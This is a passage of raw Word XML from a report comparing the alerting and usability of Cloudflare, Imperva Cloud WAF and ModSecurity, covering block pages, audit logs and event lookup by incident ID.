                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BB1AEE7" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00066AEC" w:rsidRPr="00637B42" w14:paraId="04CF2D70" w14:textId="77777777" w:rsidTr="001448F3">
        <w:trPr>
          <w:trHeight w:val="30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3177A646" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Export/Produce report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5632AAF6" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70D58FE8" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BFEB0BD" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00066AEC" w:rsidRPr="00637B42" w14:paraId="334E685D" w14:textId="77777777" w:rsidTr="001448F3">
        <w:trPr>
          <w:trHeight w:val="30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1B0ECEF2" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>View all historic alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2225E8AA" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="235B97ED" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BE03498" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="620673A7" w14:textId="48F4C5F2" w:rsidR="00066AEC" w:rsidRDefault="00066AEC" w:rsidP="00066AEC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc71138545"/>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Alerts/Usability metrics</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="4586F8CB" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRDefault="00066AEC" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E579D18" w14:textId="16A5FB0C" w:rsidR="00066AEC" w:rsidRDefault="00066AEC" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The results from Table 2 showed that </w:t>
      </w:r>
      <w:r w:rsidR="007C5DC1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cloudflare provided the most useful alerts and was most user-friendly. Imperva almost tied with Cloudflare but lacked the option to export alerts or produce report but had a quick whitelist option which Cloudflare lacked.</w:t>
      </w:r>
      <w:r w:rsidR="005608EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ModSecurity provided sufficient alert details, useful enough for investigations but was far from being user-friendly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5483C2" w14:textId="5A1763AC" w:rsidR="00274BEE" w:rsidRDefault="00274BEE" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Whenever a request gets blocked by a WAF, an error page from the WAF is expected</w:t>
      </w:r>
      <w:r w:rsidR="00E24DCF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be displayed to the user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. Different WAFs would display different error message and they could or could not be informational and beneficial for the user. Amongst the three WAFs, ModSecurity’s error pages are the least informational. Imperva and Cloudflare provide some useful information for the user and a reference ID to correlate to the alert in the respective portals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2520F26D" w14:textId="77777777" w:rsidR="005E2D8C" w:rsidRDefault="005E2D8C" w:rsidP="005E2D8C">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>When a request gets blocked by ModSecurity’s rules, the error page that would be displayed is a plain page with the header “Forbidden”. No information was given, nor anything to indicate that the request was blocked by ModSecurity. As such, one could easily confuse it with an error the server could have returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9C3ADD" w14:textId="2AABE896" w:rsidR="00702BDB" w:rsidRDefault="0099620C" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>There is no portal access for ModSecurity. Details of blocked events were found in the file /var/log/httpd/modsec_audit.log</w:t>
      </w:r>
      <w:r w:rsidR="00383210">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Figure </w:t>
      </w:r>
      <w:r w:rsidR="00583413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidR="00383210">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="007828B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B05C09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The log was viewed in terminal. </w:t>
      </w:r>
      <w:r w:rsidR="00102BCC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Although there was a unique ID for each event in the log</w:t>
      </w:r>
      <w:r w:rsidR="00882FAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00102BCC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the ID was not displayed in the error message. As such,</w:t>
      </w:r>
      <w:r w:rsidR="00882FAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> it was difficult to locate the exact event. The date and time in UTC had to be noted as that would be the closest reference.</w:t>
      </w:r>
      <w:r w:rsidR="00702BDB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Within the alert, information such as the rule triggered, the parameter that triggered the rule, pattern that was matched against the rule and more. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE9055" w14:textId="4ED4BCFA" w:rsidR="00702BDB" w:rsidRDefault="00702BDB" w:rsidP="00BE1B72">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57157818" wp14:editId="27EAF458">
            <wp:extent cx="4341412" cy="459633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5929" cy="4622293"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5262ADD1" w14:textId="476F1EC2" w:rsidR="00F55772" w:rsidRDefault="00F55772" w:rsidP="00BE1B72">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc71138539"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - ModSecurity audit log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="0DCB224A" w14:textId="3DE9EEC5" w:rsidR="00281114" w:rsidRDefault="00351CE9" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Imperva Cloud WAF</w:t>
      </w:r>
      <w:r w:rsidR="00281114">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>’s error code 15</w:t>
      </w:r>
      <w:r w:rsidR="008F241A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F55772">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="008F241A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00281114">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007379C7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>suggests</w:t>
      </w:r>
      <w:r w:rsidR="00281114">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the request was blocked by security rules. Specifically, the request is blocked by Imperva’s managed rules, while error code 16 would indicate that the request was blocked due to a rule that was self-configured.</w:t>
      </w:r>
      <w:r w:rsidR="009746DF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Within the error notification, the time, client IP, proxy IP and incident ID were noted. </w:t>
      </w:r>
      <w:r w:rsidR="00261354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This information</w:t>
      </w:r>
      <w:r w:rsidR="009746DF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> could be referenced in the events tab within the cloud WAF portal, where more details of the blockage would be </w:t>
      </w:r>
      <w:r w:rsidR="00B544F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>listed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2934C659" w14:textId="77777777" w:rsidR="00432784" w:rsidRDefault="00432784" w:rsidP="00432784">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The events, sorted by time the events occurred, could be found on the cloud WAF portal. The events could be filtered by various categories – visitor type, WAF, security, country, IP, client application and incident ID. To search a particular event, it is most accurate to filter by the incident ID. Figure 23 shows the result upon filtering the incident id of that in Figure 22. Within the event alert, more details could be found, such as the URL, user agent, query string, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>classification of the threat, parameter where the threat was attempted on and the pattern that triggered the rule. Imperva’s events were observed to take a couple of minutes from the time of blockage for the event to be displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35526F" w14:textId="6B240920" w:rsidR="00B6768F" w:rsidRDefault="00B6768F" w:rsidP="00BE1B72">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34A84A6F" wp14:editId="20C0B2CB">
            <wp:extent cx="5081954" cy="27622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3960" cy="2768776"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="607F0D61" w14:textId="31A19DF5" w:rsidR="00F55772" w:rsidRDefault="00F55772" w:rsidP="00BE1B72">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc71138540"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00314A8C">
        <w:t>Imperva error code 15</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="32E944BA" w14:textId="421F2508" w:rsidR="00B6768F" w:rsidRDefault="00B6768F" w:rsidP="00331E31">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39FE6ED5" wp14:editId="70EEC45B">
            <wp:extent cx="5731510" cy="39255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925570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDC8551" w14:textId="6856F45A" w:rsidR="00331E31" w:rsidRDefault="00331E31" w:rsidP="00331E31">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc71138541"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>23</w:t>
